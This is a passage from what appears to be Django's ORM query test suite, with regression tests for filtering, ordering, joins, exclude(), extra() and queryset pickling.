Author.objects.all() & Tag.objects.all()
with self.assertRaisesMessage(TypeError, msg):
Author.objects.all() | Tag.objects.all()
def test_ticket3141(self):
self.assertEqual(Author.objects.extra(select={'foo': '1'}).count(), 4)
self.assertEqual(
Author.objects.extra(select={'foo': '%s'}, select_params=(1,)).count(),
4
)
def test_ticket2400(self):
self.assertSequenceEqual(
Author.objects.filter(item__isnull=True),
[self.a3],
)
self.assertSequenceEqual(
Tag.objects.filter(item__isnull=True),
[self.t5],
)
def test_ticket2496(self):
self.assertSequenceEqual(
Item.objects.extra(tables=['queries_author']).select_related().order_by('name')[:1],
[self.i4],
)
def test_error_raised_on_filter_with_dictionary(self):
with self.assertRaisesMessage(FieldError, 'Cannot parse keyword query as dict'):
Note.objects.filter({'note': 'n1', 'misc': 'foo'})
def test_tickets_2076_7256(self):
# Ordering on related tables should be possible, even if the table is
# not otherwise involved.
self.assertSequenceEqual(
Item.objects.order_by('note__note', 'name'),
[self.i2, self.i4, self.i1, self.i3],
)
# Ordering on a related field should use the remote model's default
# ordering as a final step.
self.assertSequenceEqual(
Author.objects.order_by('extra', '-name'),
[self.a2, self.a1, self.a4, self.a3],
)
# Using remote model default ordering can span multiple models (in this
# case, Cover is ordered by Item's default, which uses Note's default).
self.assertSequenceEqual(Cover.objects.all(), [self.c1, self.c2])
# If the remote model does not have a default ordering, we order by its 'id'
# field.
self.assertSequenceEqual(
Item.objects.order_by('creator', 'name'),
[self.i1, self.i3, self.i2, self.i4],
)
# Ordering by a many-valued attribute (e.g. a many-to-many or reverse
# ForeignKey) is legal, but the results might not make sense. That
# isn't Django's problem. Garbage in, garbage out.
self.assertSequenceEqual(
Item.objects.filter(tags__isnull=False).order_by('tags', 'id'),
[self.i1, self.i2, self.i1, self.i2, self.i4],
)
# If we replace the default ordering, Django adjusts the required
# tables automatically. Item normally requires a join with Note to do
# the default ordering, but that isn't needed here.
qs = Item.objects.order_by('name')
self.assertSequenceEqual(qs, [self.i4, self.i1, self.i3, self.i2])
self.assertEqual(len(qs.query.alias_map), 1)
def test_tickets_2874_3002(self):
qs = Item.objects.select_related().order_by('note__note', 'name')
self.assertQuerysetEqual(qs, [self.i2, self.i4, self.i1, self.i3])
# This is also a good select_related() test because there are multiple
# Note entries in the SQL. The two Note items should be different.
self.assertEqual(repr(qs[0].note), '<Note: n2>')
self.assertEqual(repr(qs[0].creator.extra.note), '<Note: n1>')
def test_ticket3037(self):
self.assertSequenceEqual(
Item.objects.filter(Q(creator__name='a3', name='two') | Q(creator__name='a4', name='four')),
[self.i4],
)
def test_tickets_5321_7070(self):
# Ordering columns must be included in the output columns. Note that
# this means results that might otherwise be distinct are not (if there
# are multiple values in the ordering cols), as in this example. This
# isn't a bug; it's a warning to be careful with the selection of
# ordering columns.
self.assertSequenceEqual(
Note.objects.values('misc').distinct().order_by('note', '-misc'),
[{'misc': 'foo'}, {'misc': 'bar'}, {'misc': 'foo'}]
)
def test_ticket4358(self):
# If you don't pass any fields to values(), relation fields are
# returned as "foo_id" keys, not "foo". For consistency, you should be
# able to pass "foo_id" in the fields list and have it work, too. We
# actually allow both "foo" and "foo_id".
# The *_id version is returned by default.
self.assertIn('note_id', ExtraInfo.objects.values()[0])
# You can also pass it in explicitly.
self.assertSequenceEqual(ExtraInfo.objects.values('note_id'), [{'note_id': 1}, {'note_id': 2}])
# ...or use the field name.
self.assertSequenceEqual(ExtraInfo.objects.values('note'), [{'note': 1}, {'note': 2}])
def test_ticket6154(self):
# Multiple filter statements are joined using "AND" all the time.
self.assertSequenceEqual(
Author.objects.filter(id=self.a1.id).filter(Q(extra__note=self.n1) | Q(item__note=self.n3)),
[self.a1],
)
self.assertSequenceEqual(
Author.objects.filter(Q(extra__note=self.n1) | Q(item__note=self.n3)).filter(id=self.a1.id),
[self.a1],
)
def test_ticket6981(self):
self.assertSequenceEqual(
Tag.objects.select_related('parent').order_by('name'),
[self.t1, self.t2, self.t3, self.t4, self.t5],
)
def test_ticket9926(self):
self.assertSequenceEqual(
Tag.objects.select_related("parent", "category").order_by('name'),
[self.t1, self.t2, self.t3, self.t4, self.t5],
)
self.assertSequenceEqual(
Tag.objects.select_related('parent', "parent__category").order_by('name'),
[self.t1, self.t2, self.t3, self.t4, self.t5],
)
def test_tickets_6180_6203(self):
# Dates with limits and/or counts
self.assertEqual(Item.objects.count(), 4)
self.assertEqual(Item.objects.datetimes('created', 'month').count(), 1)
self.assertEqual(Item.objects.datetimes('created', 'day').count(), 2)
self.assertEqual(len(Item.objects.datetimes('created', 'day')), 2)
self.assertEqual(Item.objects.datetimes('created', 'day')[0], datetime.datetime(2007, 12, 19, 0, 0))
def test_tickets_7087_12242(self):
# Dates with extra select columns
self.assertSequenceEqual(
Item.objects.datetimes('created', 'day').extra(select={'a': 1}),
[datetime.datetime(2007, 12, 19, 0, 0), datetime.datetime(2007, 12, 20, 0, 0)],
)
self.assertSequenceEqual(
Item.objects.extra(select={'a': 1}).datetimes('created', 'day'),
[datetime.datetime(2007, 12, 19, 0, 0), datetime.datetime(2007, 12, 20, 0, 0)],
)
name = "one"
self.assertSequenceEqual(
Item.objects.datetimes('created', 'day').extra(where=['name=%s'], params=[name]),
[datetime.datetime(2007, 12, 19, 0, 0)],
)
self.assertSequenceEqual(
Item.objects.extra(where=['name=%s'], params=[name]).datetimes('created', 'day'),
[datetime.datetime(2007, 12, 19, 0, 0)],
)
def test_ticket7155(self):
# Nullable dates
self.assertSequenceEqual(
Item.objects.datetimes('modified', 'day'),
[datetime.datetime(2007, 12, 19, 0, 0)],
)
def test_order_by_rawsql(self):
self.assertSequenceEqual(
Item.objects.values('note__note').order_by(
RawSQL('queries_note.note', ()),
'id',
),
[
{'note__note': 'n2'},
{'note__note': 'n3'},
{'note__note': 'n3'},
{'note__note': 'n3'},
],
)
def test_ticket7096(self):
# Make sure exclude() with multiple conditions continues to work.
self.assertSequenceEqual(
Tag.objects.filter(parent=self.t1, name='t3').order_by('name'),
[self.t3],
)
self.assertSequenceEqual(
Tag.objects.exclude(parent=self.t1, name='t3').order_by('name'),
[self.t1, self.t2, self.t4, self.t5],
)
self.assertSequenceEqual(
Item.objects.exclude(tags__name='t1', name='one').order_by('name').distinct(),
[self.i4, self.i3, self.i2],
)
self.assertSequenceEqual(
Item.objects.filter(name__in=['three', 'four']).exclude(tags__name='t1').order_by('name'),
[self.i4, self.i3],
)
# More twisted cases, involving nested negations.
self.assertSequenceEqual(
Item.objects.exclude(~Q(tags__name='t1', name='one')),
[self.i1],
)
self.assertSequenceEqual(
Item.objects.filter(~Q(tags__name='t1', name='one'), name='two'),
[self.i2],
)
self.assertSequenceEqual(
Item.objects.exclude(~Q(tags__name='t1', name='one'), name='two'),
[self.i4, self.i1, self.i3],
)
def test_tickets_7204_7506(self):
# Make sure querysets with related fields can be pickled. If this
# doesn't crash, it's a Good Thing.
pickle.dumps(Item.objects.all())
def test_ticket7813(self):
# We should also be able to pickle things that use select_related().
# The only tricky thing here is to ensure that we do the related
# selections properly after unpickling.
qs = Item.objects.select_related()
query = qs.query.get_compiler(qs.db).as_sql()[0]
query2 = pickle.loads(pickle.dumps(qs.query))
self.assertEqual(
query2.get_compiler(qs.db).as_sql()[0],
query
)
def test_deferred_load_qs_pickling(self):
# Check pickling of deferred-loading querysets
qs = Item.objects.defer('name', 'creator')
q2 = pickle.loads(pickle.dumps(qs))
self.assertEqual(list(qs), list(q2))
q3 = pickle.loads(pickle.dumps(qs, pickle.HIGHEST_PROTOCOL))
self.assertEqual(list(qs), list(q3))
def test_ticket7277(self):
self.assertSequenceEqual(
self.n1.annotation_set.filter(
Q(tag=self.t5) | Q(tag__children=self.t5) | Q(tag__children__children=self.t5)
),
[self.ann1],
)
def test_tickets_7448_7707(self):
# Complex objects should be converted to strings before being used in
# lookups.
self.assertSequenceEqual(
Item.objects.filter(created__in=[self.time1, self.time2]),
[self.i1, self.i2],
)
def test_ticket7235(self):
# An EmptyQuerySet should not raise exceptions if it is filtered.
Eaten.objects.create(meal='m')
q = Eaten.objects.none()
with self.assertNumQueries(0):
self.assertQuerysetEqual(q.all(), [])
self.assertQuerysetEqual(q.filter(meal='m'), [])
self.assertQuerysetEqual(q.exclude(meal='m'), [])
self.assertQuerysetEqual(q.complex_filter({'pk': 1}), [])
self.assertQuerysetEqual(q.select_related('food'), [])
self.assertQuerysetEqual(q.annotate(Count('food')), [])
self.assertQuerysetEqual(q.order_by('meal', 'food'), [])
self.assertQuerysetEqual(q.distinct(), [])
self.assertQuerysetEqual(
q.extra(select={'foo': "1"}),
[]
)
self.assertQuerysetEqual(q.reverse(), [])
q.query.low_mark = 1
msg = 'Cannot change a query once a slice has been taken.'
with self.assertRaisesMessage(TypeError, msg):
q.extra(select={'foo': "1"})
self.assertQuerysetEqual(q.defer('meal'), [])
self.assertQuerysetEqual(q.only('meal'), [])
def test_ticket7791(self):
# There were "issues" when ordering and distinct-ing on fields related
# via ForeignKeys.
self.assertEqual(
len(Note.objects.order_by('extrainfo__info').distinct()),
3
)
# Pickling of QuerySets using datetimes() should work.
qs = Item.objects.datetimes('created', 'month')
pickle.loads(pickle.dumps(qs))
def test_ticket9997(self):
# If a ValuesList or Values queryset is passed as an inner query, we
# make sure it's only requesting a single value and use that as the
# thing to select.
self.assertSequenceEqual(
Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values('name')),
[self.t2, self.t3],
)
# Multi-valued values() and values_list() querysets should raise errors.
with self.assertRaisesMessage(TypeError, 'Cannot use multi-field values as a filter value.'):
Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values('name', 'id'))
with self.assertRaisesMessage(TypeError, 'Cannot use multi-field values as a filter value.'):
Tag.objects.filter(name__in=Tag.objects.filter(parent=self.t1).values_list('name', 'id'))
def test_ticket9985(self):
# qs.values_list(...).values(...) combinations should work.
self.assertSequenceEqual(
Note.objects.values_list("note", flat=True).values("id").order_by("id"),
[{'id': 1}, {'id': 2}, {'id': 3}]
)
self.assertSequenceEqual(
Annotation.objects.filter(notes__in=Note.objects.filter(note="n1").values_list('note').values('id')),
[self.ann1],
)
def test_ticket10205(self):
# When bailing out early because of an empty "__in" filter, we need
# to set things up correctly internally so that subqueries can continue properly.
self.assertEqual(Tag.objects.filter(name__in=()).update(name="foo"), 0)
def test_ticket10432(self):
# Testing an empty "__in" filter with a generator as the value.
def f():
return iter([])
n_obj = Note.objects.all()[0]
def g():
yield n_obj.pk
self.assertQuerysetEqual(Note.objects.filter(pk__in=f()), [])
self.assertEqual(list(Note.objects.filter(pk__in=g())), [n_obj])
def test_ticket10742(self):
# Queries used in an __in clause don't execute subqueries
subq = Author.objects.filter(num__lt=3000)
qs = Author.objects.filter(pk__in=subq)
self.assertSequenceEqual(qs, [self.a1, self.a2])
# The subquery result cache should not be populated
self.assertIsNone(subq._result_cache)
subq = Author.objects.filter(num__lt=3000)
qs = Author.objects.exclude(pk__in=subq)
self.assertSequenceEqual(qs, [self.a3, self.a4])
# The subquery result cache should not be populated
self.assertIsNone(subq._result_cache)
subq = Author.objects.filter(num__lt=3000)
self.assertSequenceEqual(
Author.objects.filter(Q(pk__in=subq) & Q(name='a1')),
[self.a1],
)
# The subquery result cache should not be populated
self.assertIsNone(subq._result_cache)
def test_ticket7076(self):
# Excluding shouldn't eliminate NULL entries.
self.assertSequenceEqual(
Item.objects.exclude(modified=self.time1).order_by('name'),
[self.i4, self.i3, self.i2],
)
self.assertSequenceEqual(
Tag.objects.exclude(parent__name=self.t1.name),
[self.t1, self.t4, self.t5],
)
def test_ticket7181(self):
# Ordering by related tables should accommodate nullable fields (this
# test is a little tricky, since NULL ordering is database dependent.
# Instead, we just count the number of results).
self.assertEqual(len(Tag.objects.order_by('parent__name')), 5)
# Empty querysets can be merged with others.
self.assertSequenceEqual(
Note.objects.none() | Note.objects.all(),
[self.n1, self.n2, self.n3],
)
self.assertSequenceEqual(
Note.objects.all() | Note.objects.none(),
[self.n1, self.n2, self.n3],
)
self.assertSequenceEqual(Note.objects.none() & Note.objects.all(), [])
self.assertSequenceEqual(Note.objects.all() & Note.objects.none(), [])
def test_ticket8439(self):
# Complex combinations of conjunctions, disjunctions and nullable
# relations.
self.assertSequenceEqual(
Author.objects.filter(Q(item__note__extrainfo=self.e2) | Q(report=self.r1, name='xyz')),
[self.a2],
)
self.assertSequenceEqual(
Author.objects.filter(Q(report=self.r1, name='xyz') | Q(item__note__extrainfo=self.e2)),
[self.a2],
)
self.assertSequenceEqual(
Annotation.objects.filter(Q(tag__parent=self.t1) | Q(notes__note='n1', name='a1')),
[self.ann1],
)
xx = ExtraInfo.objects.create(info='xx', note=self.n3)
self.assertSequenceEqual(
Note.objects.filter(Q(extrainfo__author=self.a1) | Q(extrainfo=xx)),
[self.n1, self.n3],
)
q = Note.objects.filter(Q(extrainfo__author=self.a1) | Q(extrainfo=xx)).query
self.assertEqual(
len([x for x in q.alias_map.values() if x.join_type == LOUTER and q.alias_refcount[x.table_alias]]),
1
)
def test_ticket17429(self):
"""
Meta.ordering=None works the same as Meta.ordering=[]
"""
original_ordering = Tag._meta.ordering
Tag._meta.ordering = None
try:
self.assertCountEqual(
Tag.objects.all(),
[self.t1, self.t2, self.t3, self.t4, self.t5],
)
finally:
Tag._meta.ordering = original_ordering
def test_exclude(self):
self.assertQuerysetEqual(
Item.objects.exclude(tags__name='t4'),
Item.objects.filter(~Q(tags__name='t4')))
self.assertQuerysetEqual(
Item.objects.exclude(Q(tags__name='t4') | Q(tags__name='t3')),
Item.objects.filter(~(Q(tags__name='t4') | Q(tags__name='t3'))))
self.assertQuerysetEqual(
Item.objects.exclude(Q(tags__name='t4') | ~Q(tags__name='t3')),
Item.objects.filter(~(Q(tags__name='t4') | ~Q(tags__name='t3'))))
def test_nested_exclude(self):
self.assertQuerysetEqual(
Item.objects.exclude(~Q(tags__name='t4')),
Item.objects.filter(~~Q(tags__name='t4')))
def test_double_exclude(self):
self.assertQuerysetEqual(
Item.objects.filter(Q(tags__name='t4')),
Item.objects.filter(~~Q(tags__name='t4')))
self.assertQuerysetEqual(
Item.objects.filter(Q(tags__name='t4')),
Item.objects.filter(~Q(~Q(tags__name='t4'))))
def test_exclude_in(self):
self.assertQuerysetEqual(
Item.objects.exclude(Q(tags__name__in=['t4', 't3'])),
Item.objects.filter(~Q(tags__name__in=['t4', 't3'])))
self.assertQuerysetEqual(
Item.objects.filter(Q(tags__name__in=['t4', 't3'])),
Item.objects.filter(~~Q(tags__name__in=['t4', 't3'])))
def test_ticket_10790_1(self):
# Querying direct fields with isnull should trim the left outer join.
# It also should not create INNER JOIN.
q = Tag.objects.filter(parent__isnull=True)
self.assertSequenceEqual(q, [self.t1])
self.assertNotIn('JOIN', str(q.query))
q = Tag.objects.filter(parent__isnull=False)
self.assertSequenceEqual(q, [self.t2, self.t3, self.t4, self.t5])
self.assertNotIn('JOIN', str(q.query))
q = Tag.objects.exclude(parent__isnull=True)
self.assertSequenceEqual(q, [self.t2, self.t3, self.t4, self.t5])
self.assertNotIn('JOIN', str(q.query))
q = Tag.objects.exclude(parent__isnull=False)
self.assertSequenceEqual(q, [self.t1])
self.assertNotIn('JOIN', str(q.query))
q = Tag.objects.exclude(parent__parent__isnull=False)
self.assertSequenceEqual(q, [self.t1, self.t2, self.t3])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
self.assertNotIn('INNER JOIN', str(q.query))
def test_ticket_10790_2(self):
# Querying across several tables should strip only the last outer join,
# while preserving the preceding inner joins.
q = Tag.objects.filter(parent__parent__isnull=False)
self.assertSequenceEqual(q, [self.t4, self.t5])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 1)
# Querying without isnull should not convert anything to left outer join.
q = Tag.objects.filter(parent__parent=self.t1)
self.assertSequenceEqual(q, [self.t4, self.t5])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 1)
def test_ticket_10790_3(self):
# Querying via indirect fields should populate the left outer join
q = NamedCategory.objects.filter(tag__isnull=True)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
# join to dumbcategory ptr_id
self.assertEqual(str(q.query).count('INNER JOIN'), 1)
self.assertSequenceEqual(q, [])
# Querying across several tables should strip only the last join, while
# preserving the preceding left outer joins.
q = NamedCategory.objects.filter(tag__parent__isnull=True)
self.assertEqual(str(q.query).count('INNER JOIN'), 1)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
self.assertSequenceEqual(q, [self.nc1])
def test_ticket_10790_4(self):
# Querying across m2m field should not strip the m2m table from join.
q = Author.objects.filter(item__tags__isnull=True)
self.assertSequenceEqual(q, [self.a2, self.a3])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 2)
self.assertNotIn('INNER JOIN', str(q.query))
q = Author.objects.filter(item__tags__parent__isnull=True)
self.assertSequenceEqual(q, [self.a1, self.a2, self.a2, self.a3])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 3)
self.assertNotIn('INNER JOIN', str(q.query))
def test_ticket_10790_5(self):
# Querying with isnull=False across m2m field should not create outer joins
q = Author.objects.filter(item__tags__isnull=False)
self.assertSequenceEqual(q, [self.a1, self.a1, self.a2, self.a2, self.a4])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 2)
q = Author.objects.filter(item__tags__parent__isnull=False)
self.assertSequenceEqual(q, [self.a1, self.a2, self.a4])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 3)
q = Author.objects.filter(item__tags__parent__parent__isnull=False)
self.assertSequenceEqual(q, [self.a4])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 4)
def test_ticket_10790_6(self):
# Querying with isnull=True across m2m field should not create inner joins
# and strip last outer join
q = Author.objects.filter(item__tags__parent__parent__isnull=True)
self.assertSequenceEqual(
q,
[self.a1, self.a1, self.a2, self.a2, self.a2, self.a3],
)
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 4)
self.assertEqual(str(q.query).count('INNER JOIN'), 0)
q = Author.objects.filter(item__tags__parent__isnull=True)
self.assertSequenceEqual(q, [self.a1, self.a2, self.a2, self.a3])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 3)
self.assertEqual(str(q.query).count('INNER JOIN'), 0)
def test_ticket_10790_7(self):
# Reverse querying with isnull should not strip the join
q = Author.objects.filter(item__isnull=True)
self.assertSequenceEqual(q, [self.a3])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 1)
self.assertEqual(str(q.query).count('INNER JOIN'), 0)
q = Author.objects.filter(item__isnull=False)
self.assertSequenceEqual(q, [self.a1, self.a2, self.a2, self.a4])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 1)
def test_ticket_10790_8(self):
# Querying with combined q-objects should also strip the left outer join
q = Tag.objects.filter(Q(parent__isnull=True) | Q(parent=self.t1))
self.assertSequenceEqual(q, [self.t1, self.t2, self.t3])
self.assertEqual(str(q.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q.query).count('INNER JOIN'), 0)
def test_ticket_10790_combine(self):
# Combining queries should not re-populate the left outer join
q1 = Tag.objects.filter(parent__isnull=True)
q2 = Tag.objects.filter(parent__isnull=False)
q3 = q1 | q2
self.assertSequenceEqual(q3, [self.t1, self.t2, self.t3, self.t4, self.t5])
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
q3 = q1 & q2
self.assertSequenceEqual(q3, [])
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
q2 = Tag.objects.filter(parent=self.t1)
q3 = q1 | q2
self.assertSequenceEqual(q3, [self.t1, self.t2, self.t3])
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
q3 = q2 | q1
self.assertSequenceEqual(q3, [self.t1, self.t2, self.t3])
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
q1 = Tag.objects.filter(parent__isnull=True)
q2 = Tag.objects.filter(parent__parent__isnull=True)
q3 = q1 | q2
self.assertSequenceEqual(q3, [self.t1, self.t2, self.t3])
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 1)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
q3 = q2 | q1
self.assertSequenceEqual(q3, [self.t1, self.t2, self.t3])
self.assertEqual(str(q3.query).count('LEFT OUTER JOIN'), 1)
self.assertEqual(str(q3.query).count('INNER JOIN'), 0)
def test_ticket19672(self):
self.assertSequenceEqual(
Report.objects.filter(Q(creator__isnull=False) & ~Q(creator__extra__value=41)),
[self.r1],
)
def test_ticket_20250(self):
# A negated Q along with an annotated queryset failed in Django 1.4
qs = Author.objects.annotate(Count('item'))
qs = qs.filter(~Q(extra__value=0)).order_by('name')
self.assertIn('SELECT', str(qs.query))
self.assertSequenceEqual(qs, [self.a1, self.a2, self.a3, self.a4])
def test_lookup_constraint_fielderror(self):
msg = (
"Cannot resolve keyword 'unknown_field' into field. Choices are: "
"annotation, category, category_id, children, id, item, "
"managedmodel, name, note, parent, parent_id"
)
with self.assertRaisesMessage(FieldError, msg):
Tag.objects.filter(unknown_field__name='generic')
def test_common_mixed_case_foreign_keys(self):
"""
Valid query should be generated when fields fetched from joined tables
include FKs whose names only differ by case.
"""
c1 = SimpleCategory.objects.create(name='c1')
c2 = SimpleCategory.objects.create(name='c2')
c3 = SimpleCategory.objects.create(name='c3')
category = CategoryItem.objects.create(category=c1)
mixed_case_field_category = MixedCaseFieldCategoryItem.objects.create(CaTeGoRy=c2)
mixed_case_db_column_category = MixedCaseDbColumnCategoryItem.objects.create(category=c3)
CommonMixedCaseForeignKeys.objects.create(
category=category,
mixed_case_field_category=mixed_case_field_category,
mixed_case_db_column_category=mixed_case_db_column_category,
)
qs = CommonMixedCaseForeignKeys.objects.values(
'category',
'mixed_case_field_category',
'mixed_case_db_column_category',
'category__category',
'mixed_case_field_category__CaTeGoRy',
'mixed_case_db_column_category__category',
)
self.assertTrue(qs.first())
def test_excluded_intermediary_m2m_table_joined(self):
self.assertSequenceEqual(
Note.objects.filter(~Q(tag__annotation__name=F('note'))),
[self.n1, self.n2, self.n3],
)
self.assertSequenceEqual(
Note.objects.filter(tag__annotation__name='a1').filter(~Q(tag__annotation__name=F('note'))),
[],
)
def test_field_with_filterable(self):
self.assertSequenceEqual(
Author.objects.filter(extra=self.e2),
[self.a3, self.a4],
)
def test_negate_field(self):
self.assertSequenceEqual(
Note.objects.filter(negate=True),
[self.n1, self.n2],
)
self.assertSequenceEqual(Note.objects.exclude(negate=True), [self.n3])
class Queries2Tests(TestCase):
@classmethod
def setUpTestData(cls):
cls.num4 = Number.objects.create(num=4)
cls.num8 = Number.objects.create(num=8)
cls.num12 = Number.objects.create(num=12)
def test_ticket4289(self):
# A slight variation on the restricting the filtering choices by the
# lookup constraints.
self.assertSequenceEqual(Number.objects.filter(num__lt=4), [])
self.assertSequenceEqual(Number.objects.filter(num__gt=8, num__lt=12), [])
self.assertSequenceEqual(
Number.objects.filter(num__gt=8, num__lt=13),
[self.num12],
)
self.assertSequenceEqual(
Number.objects.filter(Q(num__lt=4) | Q(num__gt=8, num__lt=12)),
[]
)
self.assertSequenceEqual(
Number.objects.filter(Q(num__gt=8, num__lt=12) | Q(num__lt=4)),
[]
)
self.assertSequenceEqual(
Number.objects.filter(Q(num__gt=8) & Q(num__lt=12) | Q(num__lt=4)),
[]
)
self.assertSequenceEqual(
Number.objects.filter(Q(num__gt=7) & Q(num__lt=12) | Q(num__lt=4)),
[self.num8],
)
def test_ticket12239(self):
# Custom lookups are registered to round float values correctly on gte
# and lt IntegerField queries.
self.assertSequenceEqual(
Number.objects.filter(num__gt=11.9),
[self.num12],
)
self.assertSequenceEqual(Number.objects.filter(num__gt=12), [])
self.assertSequenceEqual(Number.objects.filter(num__gt=12.0), [])
self.assertSequenceEqual(Number.objects.filter(num__gt=12.1), [])
self.assertCountEqual(
Number.objects.filter(num__lt=12),
[self.num4, self.num8],
)
self.assertCountEqual(
Number.objects.filter(num__lt=12.0),
[self.num4, self.num8],
)
self.assertCountEqual(
Number.objects.filter(num__lt=12.1),
[self.num4, self.num8, self.num12],
)
self.assertCountEqual(
Number.objects.filter(num__gte=11.9),
[self.num12],
)
self.assertCountEqual(
Number.objects.filter(num__gte=12),
[self.num12],
)
self.assertCountEqual(
Number.objects.filter(num__gte=12.0),
[self.num12],
)
self.assertSequenceEqual(Number.objects.filter(num__gte=12.1), [])
self.assertSequenceEqual(Number.objects.filter(num__gte=12.9), [])
self.assertCountEqual(
Number.objects.filter(num__lte=11.9),
[self.num4, self.num8],
)
self.assertCountEqual(
Number.objects.filter(num__lte=12),
[self.num4, self.num8, self.num12],
)
self.assertCountEqual(
Number.objects.filter(num__lte=12.0),
[self.num4, self.num8, self.num12],
)
self.assertCountEqual(
Number.objects.filter(num__lte=12.1),
[self.num4, self.num8, self.num12],
)
self.assertCountEqual(
Number.objects.filter(num__lte=12.9),
[self.num4, self.num8, self.num12],
)
def test_ticket7759(self):
# Count should work with a partially read result set.
count = Number.objects.count()
qs = Number.objects.all()
def run():
for obj in qs:
return qs.count() == count
self.assertTrue(run())
class Queries3Tests(TestCase):
def test_ticket7107(self):
# This shouldn't create an infinite loop.
self.assertQuerysetEqual(Valid.objects.all(), [])
def test_datetimes_invalid_field(self):
# An error should be raised when QuerySet.datetimes() is passed the
# wrong type of field.
msg = "'name' isn't a DateField, TimeField, or DateTimeField."
with self.assertRaisesMessage(TypeError, msg):
Item.objects.datetimes('name', 'month')
def test_ticket22023(self):
with self.assertRaisesMessage(TypeError, "Cannot call only() after .values() or .values_list()"):
Valid.objects.values().only()
with self.assertRaisesMessage(TypeError, "Cannot call defer() after .values() or .values_list()"):
Valid.objects.values().defer()
class Queries4Tests(TestCase):
@classmethod
def setUpTestData(cls):
generic = NamedCategory.objects.create(name="Generic")
cls.t1 = Tag.objects.create(name='t1', category=generic)
n1 = Note.objects.create(note='n1', misc='foo')
n2 = Note.objects.create(note='n2', misc='bar')
e1 = ExtraInfo.objects.create(info='e1', note=n1)
e2 = ExtraInfo.objects.create(info='e2', note=n2)
cls.a1 = Author.objects.create(name='a1', num=1001, extra=e1)
cls.a3 = Author.objects.create(name='a3', num=3003, extra=e2)
cls.r1 = Report.objects.create(name='r1', creator=cls.a1)
cls.r2 = Report.objects.create(name='r2', creator=cls.a3)
cls.r3 = Report.objects.create(name='r3')
cls.i1 = Item.objects.create(name='i1', created=datetime.datetime.now(), note=n1, creator=cls.a1)
cls.i2 = Item.objects.create(name='i2', created=datetime.datetime.now(), note=n1, creator=cls.a3)
def test_ticket24525(self):
tag = Tag.objects.create()
anth100 = tag.note_set.create(note='ANTH', misc='100')
math101 = tag.note_set.create(note='MATH', misc='101')
s1 = tag.annotation_set.create(name='1')
s2 = tag.annotation_set.create(name='2')
s1.notes.set([math101, anth100])
s2.notes.set([math101])
result = math101.annotation_set.all() & tag.annotation_set.exclude(notes__in=[anth100])
self.assertEqual(list(result), [s2])
def test_ticket11811(self):
unsaved_category = NamedCategory(name="Other")
msg = 'Unsaved model instance <NamedCategory: Other> cannot be used in an ORM query.'
with self.assertRaisesMessage(ValueError, msg):
Tag.objects.filter(pk=self.t1.pk).update(category=unsaved_category)
def test_ticket14876(self):
# Note: when combining the query we need to have information available
# about the join type of the trimmed "creator__isnull" join. If we
# don't have that information, then the join is created as INNER JOIN
# and results will be incorrect.
q1 = Report.objects.filter(Q(creator__isnull=True) | Q(creator__extra__info='e1'))
q2 = Report.objects.filter(Q(creator__isnull=True)) | Report.objects.filter(Q(creator__extra__info='e1'))
self.assertCountEqual(q1, [self.r1, self.r3])
self.assertEqual(str(q1.query), str(q2.query))
q1 = Report.objects.filter(Q(creator__extra__info='e1') | Q(creator__isnull=True))
q2 = Report.objects.filter(Q(creator__extra__info='e1')) | Report.objects.filter(Q(creator__isnull=True))
self.assertCountEqual(q1, [self.r1, self.r3])
self.assertEqual(str(q1.query), str(q2.query))
q1 = Item.objects.filter(Q(creator=self.a1) | Q(creator__report__name='r1')).order_by()
q2 = (
Item.objects
.filter(Q(creator=self.a1)).order_by() | Item.objects.filter(Q(creator__report__name='r1'))
.order_by()
)
self.assertCountEqual(q1, [self.i1])
self.assertEqual(str(q1.query), str(q2.query))
q1 = Item.objects.filter(Q(creator__report__name='e1') | Q(creator=self.a1)).order_by()
q2 = (
Item.objects.filter(Q(creator__report__name='e1')).order_by() |
Item.objects.filter(Q(creator=self.a1)).order_by()
)
self.assertCountEqual(q1, [self.i1])
self.assertEqual(str(q1.query), str(q2.query))
def test_combine_join_reuse(self):
# Joins having identical connections are correctly recreated in the
# rhs query, in case the query is ORed together (#18748).
Report.objects.create(name='r4', creator=self.a1)
q1 = Author.objects.filter(report__name='r5')
q2 = Author.objects.filter(report__name='r4').filter(report__name='r1')
combined = q1 | q2
self.assertEqual(str(combined.query).count('JOIN'), 2)
self.assertEqual(len(combined), 1)
self.assertEqual(combined[0].name, 'a1')
def test_combine_or_filter_reuse(self):
combined = Author.objects.filter(name='a1') | Author.objects.filter(name='a3')
self.assertEqual(combined.get(name='a1'), self.a1)
def test_join_reuse_order(self):
# Join aliases are reused in order. This shouldn't raise AssertionError
